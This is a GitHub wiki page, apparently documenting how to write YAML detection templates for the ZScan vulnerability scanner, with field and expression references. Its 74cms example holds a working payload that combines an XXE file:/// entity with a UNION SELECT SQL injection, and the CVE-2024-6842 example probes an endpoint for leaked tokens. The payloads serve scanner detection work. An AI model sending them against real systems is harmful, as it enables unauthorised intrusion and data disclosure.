-
Notifications
You must be signed in to change notification settings - Fork 2
ZScan POC Writing Guide
zcyberseclab edited this page Nov 23, 2024
·
5 revisions
POCs are written in YAML format with the following basic structure:
cve-id: CVE-2024-6842
rules:
- method: GET
path: /api/setup-complete
expression: 'response.body.bcontains(b"AuthToken\":true") && response.body.bcontains(b"ApiKey\":true")
&& response.status == 200'
severity: high
type: sensitiveinfoleakif there is no cve id, use component-type as cve-id
cve-id: 74cms-sqli-1
set:
rand: randomInt(200000000, 210000000)
rules:
- method: POST
path: /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709\xc3\x97tamp=&nonce=
headers:
Content-Type: 'text/xml'
body: <?xml version="1.0" encoding="utf-8"?><!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///">]><xml><ToUserName>&test;</ToUserName><FromUserName>1111</FromUserName><MsgType>123</MsgType><FuncFlag>3</FuncFlag><Content>1%' union select md5({{rand}})#</Content></xml>
follow_redirects: false
expression: |
response.body.bcontains(bytes(md5(string(rand))))
severity:
medium
type:
sqli-
name: POC name, should include component name and vulnerability type -
type: Vulnerability type (e.g., rce, sqli, xss) -
cveid: CVE ID (if applicable) -
severity: Vulnerability severity level -
rules: List of detection rules
Each rule can include the following fields:
-
method: HTTP request method -
path: Request path -
headers: Custom HTTP headers -
body: POST request body -
follow_redirects: Whether to follow redirects (true/false) -
expression: Vulnerability detection expression
Expressions support the following operations:
-
response.status: HTTP status code -
response.body: Response body content -
response.content_type: Content-Type header -
response.headers: Response headers
-
bcontains(b"string"): Binary content contains -
contains("string"): String contains -
startsWith("prefix"): String prefix match -
endsWith("suffix"): String suffix match
Use the set keyword to set variables: